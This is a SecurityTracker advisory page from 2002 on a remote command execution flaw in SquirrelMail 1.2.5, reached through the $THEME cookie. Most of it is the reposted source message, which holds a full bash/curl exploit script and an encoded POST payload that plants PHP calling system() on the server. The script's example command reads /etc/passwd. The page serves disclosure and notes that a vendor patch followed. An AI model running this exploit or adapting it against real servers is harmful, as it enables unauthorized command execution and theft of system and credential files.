SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Server)  >   SquirrelMail Vendors:   SquirrelMail Development Team
SquirrelMail Lets Remote Users Execute Arbitrary Commands By Appending Cookie-based Commands to the $THEME Variable
SecurityTracker Alert ID:  1003918
SecurityTracker URL:  http://securitytracker.com/id/1003918
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 29 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.2.5
Description:   A vulnerability was reported in the SquirrelMail web-based mail server. An authenticated remote user can cause arbitrary commands to be executed on the server.

It is reported that a valid and authenticated remote user can append $THEME variable with user-supplied commands via cookies.

A demonstration exploit is provided in the Source Message.

Impact:   A valid and authenticated remote user can execute arbitrary commands on the server with the privileges of the web server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.squirrelmail.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Issues Patch) Re: SquirrelMail Lets Remote Users Execute Arbitrary Commands By Appending Cookie-based Commands to the $THEME Variable
The vendor has issued a patch.



 Source Message Contents

Subject:  squirrelmail 1.2.5 email user can execute command




email user  can append $THEME variable through 
cookies

---------------- start sq125x ---------------------

#!/bin/bash
#
# squirrelmail-1.2.5 remote execution by pokleyzz 
http://www.inetd-secure.net
#
# usage   : ./sq125x themecount username password 
url command
# example : ./sq125x 2 pokley 123456 
http://mail.pokleyzz.my/mail "cat /etc/passwd"
#
# curl can be found at http://curl.haxx.se/libcurl/
#

export 
PATH="/usr/bin:/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/l
ocal/sbin"
export CURL="/usr/bin/curl"
export USERNAME="$2"
export PASSWORD="$3"
export THEME_COUNT="$1"
export URL="$4"
export COMMAND=`echo $5|sed 's/\ /%20/g' -` 
export TMPFILE="header.tmp"
export THEME="theme[${THEME_COUNT}][PATH]
=../data/${USERNAME}.pref; theme
[${THEME_COUNT}][NAME]=testing"

#step 1
sed "s/pokley/"$USERNAME"/g" post.txt >lame.txt
/bin/rm -rf ${TMPFILE}
$CURL -b "$THEME" -d 
login_username=${USERNAME} -d 
secretkey=${PASSWORD} -d 
js_autodetect_results=0 -d just_logged_in=1 -D 
${TMPFILE} ${URL}/src/redirect.php
export COOKIES=`cat ${TMPFILE} |grep Set-
Cookie|awk {'print $2'}|while read data;do printf '%b' 
$data;done`
export COOKIES="${COOKIES} ${THEME}"
$CURL -b "$COOKIES" -d @lame.txt -o /tmp/.tmp --
silent ${URL}/src/options.php

#step 2
sleep 5s
$CURL -b "$THEME" -d 
login_username=${USERNAME} -d 
secretkey=${PASSWORD} -d 
js_autodetect_results=0 -d just_logged_in=1 -D 
${TMPFILE} ${URL}/src/redirect.php
export COOKIES=`cat ${TMPFILE} |grep Set-
Cookie|awk {'print $2'}|while read data;do printf '%b' 
$data;done`
export COOKIES="${COOKIES} ${THEME}"
$CURL -b "$COOKIES" -d @lame.txt -o /tmp/.tmp --
silent ${URL}/src/options.php
$CURL -b "$COOKIES" ${URL}/src/left_main.php?
cmdd=${COMMAND}
$CURL -b "$COOKIES" -o /tmp/.tmp --silent 
${URL}/src/signout.php
rm -rf lame.txt /tmp/.tmp
-------------- end sq125 ----------------------

-------------- start post.txt --------------------
optpage=display&optmode=submit&new_chosen_the
me=..%2Fdata%
2Fpokley.pref&new_custom_css=none&new_languag
e=&new_javascript_setting=2&new_js_autodetect_re
sults=1&new_show_num=15%0D%0A%3C%3F+%
0D%0Asystem%28%24cmdd%29%3B+%0D%0A%
3F%
3E&new_alt_index_colors=1&new_page_selector=1&
new_page_selector_max=10&new_wrap_at=86&new
_editor_size=76&new_location_of_buttons=between&
new_use_javascript_addr_book=0&new_show_html_
default=0&new_include_self_reply_all=1&new_show_
xmailer_default=0&new_attachment_common_show_
images=0&new_pf_subtle_link=1&new_pf_cleandispl
ay=0&new_mdn_user_support=1&new_compose_ne
w_win=0&delete_move_next_bi=on&delete_move_ne
xt_formATbottomi=on&submit_display=Submit
----------------------end post.txt --------------------------


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC